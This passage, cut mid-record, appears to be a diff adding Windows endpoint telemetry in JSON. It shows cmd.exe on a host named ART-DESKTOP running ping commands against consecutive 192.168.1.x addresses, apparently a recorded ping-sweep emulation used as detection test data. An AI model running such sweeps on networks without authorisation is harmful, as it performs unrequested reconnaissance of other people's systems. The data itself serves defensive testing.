"image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "process", + "pid": 976, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572476840000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.102", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": 
"{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 
"C:\\Windows\\System32\\mswsock.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572481830000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.103", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572481980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { 
+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 
1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572486840000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.104", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": 
"kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7916, + "process_name": "PING.EXE", 
+ "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "process", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572491990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.105", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572492130000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572496840000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.106", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6008, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "process", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572501990000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.107", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4128, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "process", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572506840000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.108", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572506980000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
